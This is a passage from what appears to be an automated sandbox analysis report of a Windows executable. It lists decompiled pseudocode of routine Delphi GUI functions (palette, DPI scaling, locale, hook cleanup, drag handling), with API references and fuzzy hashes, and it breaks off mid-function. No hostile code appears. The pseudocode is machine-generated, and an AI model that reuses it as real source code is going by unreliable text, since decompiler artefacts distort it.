                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Class$Window$CreateInfoLongRegisterUnregister
                                                                        • String ID:
                                                                        • API String ID: 3404767174-0
                                                                        • Opcode ID: c05f6195fd41eecf4557a0ad01478a202fa1614434dc745f5eeeea4aa40e0583
                                                                        • Instruction ID: 74b4939fce1307e55b377de450ca8e826035f92d8163aee15a1af6e20c356675
                                                                        • Opcode Fuzzy Hash: c05f6195fd41eecf4557a0ad01478a202fa1614434dc745f5eeeea4aa40e0583
                                                                        • Instruction Fuzzy Hash: 2C0184B1B041046BCB10EBA8DD85F9E33ACE749308F114177FD18E72D1D67AA9948B6E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 70%
                                                                        			E00421180(void* __eax) {
                                                                        				char _v5;
                                                                        				struct HDC__* _v12;
                                                                        				struct HPALETTE__* _t21;
                                                                        				struct HPALETTE__* _t25;
                                                                        				void* _t28;
                                                                        				intOrPtr _t35;
                                                                        				void* _t37;
                                                                        				void* _t39;
                                                                        				intOrPtr _t40;
                                                                        
                                                                        				_t37 = _t39;
                                                                        				_t40 = _t39 + 0xfffffff8;
                                                                        				_t28 = __eax;
                                                                        				_v5 = 0;
                                                                        				if( *0x496a28 == 0) {
                                                                        					return _v5;
                                                                        				} else {
                                                                        					_v12 = GetDC(0);
                                                                        					_push(_t37);
                                                                        					_push(0x421206);
                                                                        					_push( *[fs:edx]);
                                                                        					 *[fs:edx] = _t40;
                                                                        					if(GetDeviceCaps(_v12, 0x68) >= 0x10) {
                                                                        						_t21 =  *0x496a28; // 0xb7080776
                                                                        						GetPaletteEntries(_t21, 0, 8, _t28 + 4);
                                                                        						_t25 =  *0x496a28; // 0xb7080776
                                                                        						GetPaletteEntries(_t25, 8, 8, _t28 + ( *(_t28 + 2) & 0x0000ffff) * 4 - 0x1c);
                                                                        						_v5 = 1;
                                                                        					}
                                                                        					_pop(_t35);
                                                                        					 *[fs:eax] = _t35;
                                                                        					_push(0x42120d);
                                                                        					return ReleaseDC(0, _v12);
                                                                        				}
                                                                        			}













                                                                        APIs
                                                                        • GetDC.USER32(00000000), ref: 00421198
                                                                        • GetDeviceCaps.GDI32(?,00000068), ref: 004211B4
                                                                        • GetPaletteEntries.GDI32(B7080776,00000000,00000008,?), ref: 004211CC
                                                                        • GetPaletteEntries.GDI32(B7080776,00000008,00000008,?), ref: 004211E4
                                                                        • ReleaseDC.USER32 ref: 00421200
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: EntriesPalette$CapsDeviceRelease
                                                                        • String ID:
                                                                        • API String ID: 3128150645-0
                                                                        • Opcode ID: 79fdbde6109411654c512e7f0f10eb7e6e8b827a2d93cc2535a36f409679effe
                                                                        • Instruction ID: 2e08d2bdc4763a876f0246fa622096bae7d75537cc4679951bf392552e8ebcb6
                                                                        • Opcode Fuzzy Hash: 79fdbde6109411654c512e7f0f10eb7e6e8b827a2d93cc2535a36f409679effe
                                                                        • Instruction Fuzzy Hash: A2110871648344AEEB00CBE59C42F697BECE719714F5180A7F504EA2C1DA7BA454C728
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 65%
                                                                        			E00462FB4(void* __eax) {
                                                                        				struct HDC__* _v8;
                                                                        				int _t13;
                                                                        				void* _t25;
                                                                        				intOrPtr _t32;
                                                                        				int _t35;
                                                                        				intOrPtr _t37;
                                                                        				intOrPtr _t39;
                                                                        
                                                                        				_t37 = _t39;
                                                                        				_t25 = __eax;
                                                                        				if( *((char*)(__eax + 0x2e8)) == 1) {
                                                                        					return __eax;
                                                                        				} else {
                                                                        					_v8 = GetDC(0);
                                                                        					_push(_t37);
                                                                        					_push(0x463039);
                                                                        					_push( *[fs:eax]);
                                                                        					 *[fs:eax] = _t39;
                                                                        					_t13 = GetDeviceCaps(_v8, 0x5a);
                                                                        					_t35 = MulDiv(E0041F6E8( *((intOrPtr*)(_t25 + 0x68))), _t13, 0x48);
                                                                        					 *(_t25 + 0x2b0) = _t35;
                                                                        					E004609B0(_t25, MulDiv(_t35, 0x78, 0x64));
                                                                        					 *((intOrPtr*)(_t25 + 0x2e4)) =  *((intOrPtr*)(_t25 + 0x234));
                                                                        					_pop(_t32);
                                                                        					 *[fs:eax] = _t32;
                                                                        					_push(0x463040);
                                                                        					return ReleaseDC(0, _v8);
                                                                        				}
                                                                        			}











                                                                        APIs
                                                                        • GetDC.USER32(00000000), ref: 00462FC7
                                                                        • GetDeviceCaps.GDI32(?,0000005A), ref: 00462FE5
                                                                          • Part of subcall function 0041F6E8: MulDiv.KERNEL32(00000000,00000048,?), ref: 0041F6F9
                                                                        • MulDiv.KERNEL32(00000000,00000000,?), ref: 00462FF4
                                                                        • MulDiv.KERNEL32(00000000,00000078,00000064), ref: 00463006
                                                                        • ReleaseDC.USER32 ref: 00463033
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CapsDeviceRelease
                                                                        • String ID:
                                                                        • API String ID: 127614599-0
                                                                        • Opcode ID: c8f9a4b56b8d92118ec137326b8e62c1c4f18263f51af8fef2feb35d9f79c448
                                                                        • Instruction ID: 8a975a19c502e7ba5fed77ab0f9ea342d1e76ffa1a8a0f0d302a6746974fb504
                                                                        • Opcode Fuzzy Hash: c8f9a4b56b8d92118ec137326b8e62c1c4f18263f51af8fef2feb35d9f79c448
                                                                        • Instruction Fuzzy Hash: DE01D2717483406FE700EF658C46B5A77DCDB09715F1100B6F908EB2C2DA795D008768
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 64%
                                                                        			E00409C5C(void* __esi, void* __eflags) {
                                                                        				char _v8;
                                                                        				intOrPtr* _t18;
                                                                        				intOrPtr _t26;
                                                                        				void* _t27;
                                                                        				long _t29;
                                                                        				intOrPtr _t32;
                                                                        				void* _t33;
                                                                        
                                                                        				_t33 = __eflags;
                                                                        				_push(0);
                                                                        				_push(_t32);
                                                                        				_push(0x409cf3);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t32;
                                                                        				E004099D4(GetThreadLocale(), 0x409d08, 0x100b,  &_v8);
                                                                        				_t29 = E004087C0(0x409d08, 1, _t33);
                                                                        				if(_t29 + 0xfffffffd - 3 < 0) {
                                                                        					EnumCalendarInfoA(E00409BA8, GetThreadLocale(), _t29, 4);
                                                                        					_t27 = 7;
                                                                        					_t18 = 0x49681c;
                                                                        					do {
                                                                        						 *_t18 = 0xffffffff;
                                                                        						_t18 = _t18 + 4;
                                                                        						_t27 = _t27 - 1;
                                                                        					} while (_t27 != 0);
                                                                        					EnumCalendarInfoA(E00409BE4, GetThreadLocale(), _t29, 3);
                                                                        				}
                                                                        				_pop(_t26);
                                                                        				 *[fs:eax] = _t26;
                                                                        				_push(E00409CFA);
                                                                        				return E00404348( &_v8);
                                                                        			}

                                                                        APIs
                                                                        • GetThreadLocale.KERNEL32(?,00000000,00409CF3,?,?,00000000), ref: 00409C74
                                                                          • Part of subcall function 004099D4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 004099F2
                                                                        • GetThreadLocale.KERNEL32(00000000,00000004,00000000,00409CF3,?,?,00000000), ref: 00409CA4
                                                                        • EnumCalendarInfoA.KERNEL32(Function_00009BA8,00000000,00000000,00000004), ref: 00409CAF
                                                                        • GetThreadLocale.KERNEL32(00000000,00000003,00000000,00409CF3,?,?,00000000), ref: 00409CCD
                                                                        • EnumCalendarInfoA.KERNEL32(Function_00009BE4,00000000,00000000,00000003), ref: 00409CD8
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Locale$InfoThread$CalendarEnum
                                                                        • String ID:
                                                                        • API String ID: 4102113445-0
                                                                        • Opcode ID: 790f7a62ba9bfdb9f10ecce0afa5b16d7d82922cee3855c682fc3fe35e3b7d87
                                                                        • Instruction ID: d1406e9af6801d42e4c1d76f03b95420f91cc8fef24ea995857c9060e22c89c4
                                                                        • Opcode Fuzzy Hash: 790f7a62ba9bfdb9f10ecce0afa5b16d7d82922cee3855c682fc3fe35e3b7d87
                                                                        • Instruction Fuzzy Hash: 6401F7716046046EE701B7759D13FAA719CDF41B28F224137F801B7AC2D63C9E0086AC
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00454F68() {
                                                                        				void* _t2;
                                                                        				void* _t5;
                                                                        				void* _t8;
                                                                        				struct HHOOK__* _t10;
                                                                        
                                                                        				if( *0x496c1c != 0) {
                                                                        					_t10 =  *0x496c1c; // 0x0
                                                                        					UnhookWindowsHookEx(_t10);
                                                                        				}
                                                                        				 *0x496c1c = 0;
                                                                        				if( *0x496c20 != 0) {
                                                                        					_t2 =  *0x496c18; // 0x0
                                                                        					SetEvent(_t2);
                                                                        					if(GetCurrentThreadId() !=  *0x496c14) {
                                                                        						_t8 =  *0x496c20; // 0x0
                                                                        						WaitForSingleObject(_t8, 0xffffffff);
                                                                        					}
                                                                        					_t5 =  *0x496c20; // 0x0
                                                                        					CloseHandle(_t5);
                                                                        					 *0x496c20 = 0;
                                                                        					return 0;
                                                                        				}
                                                                        				return 0;
                                                                        			}

                                                                        APIs
                                                                        • UnhookWindowsHookEx.USER32(00000000), ref: 00454F77
                                                                        • SetEvent.KERNEL32(00000000,00457212,00000000,004562EF,?,?,004798C4,00000001,004563AF,?,?,?,004798C4), ref: 00454F92
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00454F97
                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00457212,00000000,004562EF,?,?,004798C4,00000001,004563AF,?,?,?,004798C4), ref: 00454FAC
                                                                        • CloseHandle.KERNEL32(00000000,00000000,00457212,00000000,004562EF,?,?,004798C4,00000001,004563AF,?,?,?,004798C4), ref: 00454FB7
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CloseCurrentEventHandleHookObjectSingleThreadUnhookWaitWindows
                                                                        • String ID:
                                                                        • API String ID: 2429646606-0
                                                                        • Opcode ID: f342eaf5d6d82dadfeef3d3fe6df92537fcd3f42866fbe39511197cf40211446
                                                                        • Instruction ID: 98b08e2d4b11bd526172336b730c09841e2ca8282cf2238b0d719a92ae855655
                                                                        • Opcode Fuzzy Hash: f342eaf5d6d82dadfeef3d3fe6df92537fcd3f42866fbe39511197cf40211446
                                                                        • Instruction Fuzzy Hash: C1F01C716041009AC710FBBDDD85E1536E4E718349B03493BB581E71A5CB3DD480CF1C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 86%
                                                                        			E004573E0(char __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                                        				char _v8;
                                                                        				int _v12;
                                                                        				char _v16;
                                                                        				intOrPtr _v20;
                                                                        				intOrPtr _v24;
                                                                        				struct tagPOINT _v32;
                                                                        				char _v33;
                                                                        				intOrPtr _v40;
                                                                        				char _v44;
                                                                        				intOrPtr _v48;
                                                                        				struct HWND__* _v52;
                                                                        				intOrPtr _v56;
                                                                        				char _v60;
                                                                        				struct tagRECT _v76;
                                                                        				intOrPtr _v80;
                                                                        				intOrPtr _v84;
                                                                        				int _v88;
                                                                        				int _v92;
                                                                        				intOrPtr _v96;
                                                                        				char _v100;
                                                                        				struct tagRECT _v116;
                                                                        				char _v132;
                                                                        				intOrPtr _v136;
                                                                        				char _v140;
                                                                        				char _v144;
                                                                        				char _v148;
                                                                        				struct HWND__* _t135;
                                                                        				struct HWND__* _t171;
                                                                        				intOrPtr _t193;
                                                                        				char _t199;
                                                                        				intOrPtr _t223;
                                                                        				intOrPtr _t227;
                                                                        				intOrPtr* _t262;
                                                                        				intOrPtr _t281;
                                                                        				intOrPtr _t282;
                                                                        				intOrPtr _t284;
                                                                        				intOrPtr _t290;
                                                                        				intOrPtr* _t319;
                                                                        				intOrPtr _t320;
                                                                        				void* _t327;
                                                                        
                                                                        				_t326 = _t327;
                                                                        				_v144 = 0;
                                                                        				_v148 = 0;
                                                                        				asm("movsd");
                                                                        				asm("movsd");
                                                                        				_v8 = __eax;
                                                                        				_t281 =  *0x44d464; // 0x44d468
                                                                        				E00404D24( &_v100, _t281);
                                                                        				_t262 =  &_v8;
                                                                        				_push(_t327);
                                                                        				_push(0x45778b);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t327 + 0xffffff70;
                                                                        				 *((char*)( *_t262 + 0x58)) = 0;
                                                                        				if( *((char*)( *_t262 + 0x88)) == 0 ||  *((intOrPtr*)( *_t262 + 0x60)) == 0 || E0044D81C() == 0 || E00454DE0(E00434E58( &_v16, 1)) !=  *((intOrPtr*)( *_t262 + 0x60))) {
                                                                        					L23:
                                                                        					_t135 = _v52;
                                                                        					__eflags = _t135;
                                                                        					if(_t135 <= 0) {
                                                                        						E004571F4( *_t262);
                                                                        					} else {
                                                                        						E00456FFC( *_t262, 0, _t135);
                                                                        					}
                                                                        					goto L26;
                                                                        				} else {
                                                                        					_v100 =  *((intOrPtr*)( *_t262 + 0x60));
                                                                        					_v92 = _v16;
                                                                        					_v88 = _v12;
                                                                        					_v88 = _v88 + E0045722C();
                                                                        					_v84 = E004541A4();
                                                                        					_v80 =  *((intOrPtr*)( *_t262 + 0x5c));
                                                                        					E00435F4C( *((intOrPtr*)( *_t262 + 0x60)),  &_v132);
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x60)))) + 0x40))();
                                                                        					_v32.x = 0;
                                                                        					_v32.y = 0;
                                                                        					_t319 =  *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x60)) + 0x30));
                                                                        					_t333 = _t319;
                                                                        					if(_t319 == 0) {
                                                                        						_t320 =  *((intOrPtr*)( *_t262 + 0x60));
                                                                        						_t290 =  *0x4323f0; // 0x43243c
                                                                        						_t171 = E00403768(_t320, _t290);
                                                                        						__eflags = _t171;
                                                                        						if(_t171 != 0) {
                                                                        							__eflags =  *(_t320 + 0x190);
                                                                        							if( *(_t320 + 0x190) != 0) {
                                                                        								ClientToScreen( *(_t320 + 0x190),  &_v32);
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						 *((intOrPtr*)( *_t319 + 0x40))();
                                                                        					}
                                                                        					OffsetRect( &_v76, _v32.x - _v24, _v32.y - _v20);
                                                                        					E004360F0( *((intOrPtr*)( *_t262 + 0x60)),  &_v140,  &_v16);
                                                                        					_v60 = _v140;
                                                                        					_v56 = _v136;
                                                                        					E00454DA8( *((intOrPtr*)( *_t262 + 0x60)),  &_v148);
                                                                        					E004336E0(_v148,  &_v140,  &_v144, _t333);
                                                                        					E004043E0( &_v44, _v144);
                                                                        					_v52 = 0;
                                                                        					_v48 =  *((intOrPtr*)( *_t262 + 0x74));
                                                                        					_t193 =  *0x47aaf0; // 0x432a84
                                                                        					_v96 = _t193;
                                                                        					_v40 = 0;
                                                                        					_v33 = E00437760( *((intOrPtr*)( *_t262 + 0x60)), 0, 0xb030,  &_v100) == 0;
                                                                        					if(_v33 != 0 &&  *((short*)( *_t262 + 0x11a)) != 0) {
                                                                        						 *((intOrPtr*)( *_t262 + 0x118))( &_v100);
                                                                        					}
                                                                        					if(_v33 == 0 ||  *((intOrPtr*)( *_t262 + 0x60)) == 0) {
                                                                        						_t199 = 0;
                                                                        					} else {
                                                                        						_t199 = 1;
                                                                        					}
                                                                        					_t296 =  *_t262;
                                                                        					 *((char*)( *_t262 + 0x58)) = _t199;
                                                                        					if( *((char*)( *_t262 + 0x58)) == 0) {
                                                                        						goto L23;
                                                                        					} else {
                                                                        						_t340 = _v44;
                                                                        						if(_v44 == 0) {
                                                                        							goto L23;
                                                                        						}
                                                                        						E00457380(_v96, _t296, _t326);
                                                                        						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x84)))) + 0x70))();
                                                                        						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x84)))) + 0xd4))( &_v116, _v40);
                                                                        						OffsetRect( &_v116, _v92, _v88);
                                                                        						if(E004037D8( *((intOrPtr*)( *_t262 + 0x84)), _t340) != 0) {
                                                                        							_v116.left = _v116.left - E0042056C( *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x84)) + 0x208)), _v44) + 5;
                                                                        							_v116.right = _v116.right - E0042056C( *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x84)) + 0x208)), _v44) + 5;
                                                                        						}
                                                                        						E004360C4( *((intOrPtr*)( *_t262 + 0x60)),  &_v140,  &_v76);
                                                                        						_t223 =  *_t262;
                                                                        						 *((intOrPtr*)(_t223 + 0x64)) = _v140;
                                                                        						 *((intOrPtr*)(_t223 + 0x68)) = _v136;
                                                                        						E004360C4( *((intOrPtr*)( *_t262 + 0x60)),  &_v140,  &(_v76.right));
                                                                        						_t227 =  *_t262;
                                                                        						 *((intOrPtr*)(_t227 + 0x6c)) = _v140;
                                                                        						 *((intOrPtr*)(_t227 + 0x70)) = _v136;
                                                                        						E0043674C( *((intOrPtr*)( *_t262 + 0x84)), _v80);
                                                                        						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x84)))) + 0xd0))(_v40);
                                                                        						E00454EF4(_v44);
                                                                        						_t236 = _v52;
                                                                        						if(_v52 <= 0) {
                                                                        							E00456FFC( *_t262, 1, _v48);
                                                                        						} else {
                                                                        							E00456FFC( *_t262, 0, _t236);
                                                                        						}
                                                                        						L26:
                                                                        						_pop(_t282);
                                                                        						 *[fs:eax] = _t282;
                                                                        						_push(0x457792);
                                                                        						E0040436C( &_v148, 2);
                                                                        						_t284 =  *0x44d464; // 0x44d468
                                                                        						return E00404DF4( &_v100, _t284);
                                                                        					}
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                          • Part of subcall function 0044D81C: GetActiveWindow.USER32 ref: 0044D81F
                                                                          • Part of subcall function 0044D81C: GetCurrentThreadId.KERNEL32 ref: 0044D834
                                                                          • Part of subcall function 0044D81C: EnumThreadWindows.USER32(00000000,0044D7FC), ref: 0044D83A
                                                                          • Part of subcall function 0045722C: GetCursor.USER32(?), ref: 00457247
                                                                          • Part of subcall function 0045722C: GetIconInfo.USER32(00000000,?), ref: 0045724D
                                                                        • ClientToScreen.USER32(?,?), ref: 0045750C
                                                                        • OffsetRect.USER32(?,?,?), ref: 00457523
                                                                        • OffsetRect.USER32(?,?,?), ref: 00457653
                                                                          • Part of subcall function 00456FFC: SetTimer.USER32(00000000,00000000,?,00454E00), ref: 00457016
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: OffsetRectThread$ActiveClientCurrentCursorEnumIconInfoScreenTimerWindowWindows
                                                                        • String ID: <$C
                                                                        • API String ID: 2591747986-3423417450
                                                                        • Opcode ID: 00bf1ddf5426e94dbb9774d478e7e55c612c9b43fdf6370cf5323fbe8e4eb597
                                                                        • Instruction ID: 30bf7d25c4205cc9a04f9c4c997c4720ffd439aca70f5178930e4931d0ecf433
                                                                        • Opcode Fuzzy Hash: 00bf1ddf5426e94dbb9774d478e7e55c612c9b43fdf6370cf5323fbe8e4eb597
                                                                        • Instruction Fuzzy Hash: C9D1F575A00618CFCB00DFA8D884A9EB7F5BF49304F1580AAE904EB366DB34AD49CF55
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 89%
                                                                        			E00440F1C(intOrPtr* __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi, void* __fp0) {
                                                                        				intOrPtr* _v8;
                                                                        				struct tagPOINT _v16;
                                                                        				char _v20;
                                                                        				intOrPtr _v24;
                                                                        				intOrPtr _v28;
                                                                        				intOrPtr _v32;
                                                                        				char _v36;
                                                                        				struct tagMSG _v64;
                                                                        				intOrPtr _v68;
                                                                        				long _v72;
                                                                        				char _v76;
                                                                        				intOrPtr _t125;
                                                                        				int _t126;
                                                                        				int _t140;
                                                                        				int _t147;
                                                                        				intOrPtr* _t175;
                                                                        				int _t186;
                                                                        				void* _t191;
                                                                        				intOrPtr* _t209;
                                                                        				void* _t213;
                                                                        				intOrPtr _t214;
                                                                        				intOrPtr _t219;
                                                                        				int _t232;
                                                                        				intOrPtr _t233;
                                                                        				int _t236;
                                                                        				intOrPtr* _t242;
                                                                        				intOrPtr _t262;
                                                                        				intOrPtr _t278;
                                                                        				intOrPtr _t289;
                                                                        				int _t297;
                                                                        				int _t300;
                                                                        				int _t302;
                                                                        				int _t303;
                                                                        				int _t304;
                                                                        				void* _t307;
                                                                        				void* _t309;
                                                                        				void* _t315;
                                                                        
                                                                        				_t315 = __fp0;
                                                                        				_t306 = _t307;
                                                                        				_push(__edi);
                                                                        				_v76 = 0;
                                                                        				_t242 = __edx;
                                                                        				_v8 = __eax;
                                                                        				_push(_t307);
                                                                        				_push(0x4412f4);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t307 + 0xffffffb8;
                                                                        				_t125 =  *__edx;
                                                                        				_t309 = _t125 - 0x202;
                                                                        				if(_t309 > 0) {
                                                                        					_t126 = _t125 - 0x203;
                                                                        					__eflags = _t126;
                                                                        					if(__eflags == 0) {
                                                                        						E00407314( *((intOrPtr*)(__edx + 8)), 0,  &_v72);
                                                                        						_t297 = E0043F9A8(_v8,  &_v20,  &_v72, __eflags);
                                                                        						__eflags = _t297;
                                                                        						if(_t297 != 0) {
                                                                        							__eflags =  *(_t297 + 4);
                                                                        							if( *(_t297 + 4) != 0) {
                                                                        								__eflags = _v20 - 2;
                                                                        								if(_v20 == 2) {
                                                                        									E00434E0C();
                                                                        									E004372AC( *(_t297 + 4), 0, 0, 1);
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						L47:
                                                                        						if( *((short*)(_v8 + 0x32)) != 0) {
                                                                        							 *((intOrPtr*)(_v8 + 0x30))();
                                                                        						}
                                                                        						L49:
                                                                        						_pop(_t262);
                                                                        						 *[fs:eax] = _t262;
                                                                        						_push(0x4412fb);
                                                                        						return E00404348( &_v76);
                                                                        					}
                                                                        					_t140 = _t126 - 0xae2d;
                                                                        					__eflags = _t140;
                                                                        					if(_t140 == 0) {
                                                                        						 *((intOrPtr*)(_v8 + 0x30))();
                                                                        						__eflags =  *(__edx + 0xc);
                                                                        						if( *(__edx + 0xc) != 0) {
                                                                        							goto L49;
                                                                        						}
                                                                        						_t300 =  *((intOrPtr*)( *_v8 + 4))();
                                                                        						__eflags = _v20 - 0x12;
                                                                        						if(_v20 != 0x12) {
                                                                        							__eflags = _t300;
                                                                        							if(_t300 == 0) {
                                                                        								goto L49;
                                                                        							}
                                                                        							_t147 = _v20 - 2;
                                                                        							__eflags = _t147;
                                                                        							if(_t147 == 0) {
                                                                        								L46:
                                                                        								E00435F4C(_t300,  &_v36);
                                                                        								 *((intOrPtr*)( *_v8))();
                                                                        								_v36 = _v36 - _v36 -  *((intOrPtr*)(_t300 + 0x40)) + _v36 -  *((intOrPtr*)(_t300 + 0x40));
                                                                        								_v32 = _v32 - _v32 -  *((intOrPtr*)(_t300 + 0x44)) + _v32 -  *((intOrPtr*)(_t300 + 0x44));
                                                                        								_v28 = _v28 -  *((intOrPtr*)(_t300 + 0x48)) - _v28 - _v36 +  *((intOrPtr*)(_t300 + 0x48)) - _v28 - _v36;
                                                                        								_v24 = _v24 -  *((intOrPtr*)(_t300 + 0x4c)) - _v24 - _v32 +  *((intOrPtr*)(_t300 + 0x4c)) - _v24 - _v32;
                                                                        								E004365AC(_t300,  &_v76);
                                                                        								E0040439C( *((intOrPtr*)(_t242 + 8)) + 0x38, _v76);
                                                                        								asm("movsd");
                                                                        								asm("movsd");
                                                                        								asm("movsd");
                                                                        								asm("movsd");
                                                                        								goto L49;
                                                                        							}
                                                                        							__eflags = _t147 != 0x12;
                                                                        							if(_t147 != 0x12) {
                                                                        								goto L49;
                                                                        							}
                                                                        							goto L46;
                                                                        						}
                                                                        						E00404348( *((intOrPtr*)(__edx + 8)) + 0x38);
                                                                        						goto L49;
                                                                        					} else {
                                                                        						__eflags = _t140 == 0x12;
                                                                        						if(_t140 == 0x12) {
                                                                        							_t175 =  *((intOrPtr*)(__edx + 8));
                                                                        							__eflags =  *_t175 - 0xb00b;
                                                                        							if( *_t175 == 0xb00b) {
                                                                        								E00440E00(_v8,  *((intOrPtr*)(_t175 + 4)),  *((intOrPtr*)(__edx + 4)), __edi);
                                                                        							}
                                                                        						}
                                                                        						goto L47;
                                                                        					}
                                                                        				}
                                                                        				if(_t309 == 0) {
                                                                        					__eflags =  *(_v8 + 0x60);
                                                                        					if(__eflags != 0) {
                                                                        						E0044094C(_v8, __eflags);
                                                                        					} else {
                                                                        						E00407314( *((intOrPtr*)(__edx + 8)), 0,  &_v16);
                                                                        						_t302 = E0043F9A8(_v8,  &_v20,  &_v16, __eflags);
                                                                        						__eflags = _t302;
                                                                        						if(_t302 != 0) {
                                                                        							__eflags = _v20 - 0x14;
                                                                        							if(_v20 == 0x14) {
                                                                        								_t295 =  *((intOrPtr*)(_t302 + 4));
                                                                        								_t278 =  *0x44c130; // 0x44c17c
                                                                        								_t186 = E00403768( *((intOrPtr*)(_t302 + 4)), _t278);
                                                                        								__eflags = _t186;
                                                                        								if(_t186 == 0) {
                                                                        									E004364CC(_t295, 0);
                                                                        								} else {
                                                                        									E00453004(_t295,  &_v20);
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					goto L47;
                                                                        				}
                                                                        				_t191 = _t125 - 0x20;
                                                                        				if(_t191 == 0) {
                                                                        					GetCursorPos( &_v16);
                                                                        					E004360F0( *((intOrPtr*)(_v8 + 0x14)),  &_v72,  &_v16);
                                                                        					_v16.x = _v72;
                                                                        					_v16.y = _v68;
                                                                        					__eflags =  *((short*)(_t242 + 8)) - 1;
                                                                        					if( *((short*)(_t242 + 8)) != 1) {
                                                                        						goto L47;
                                                                        					}
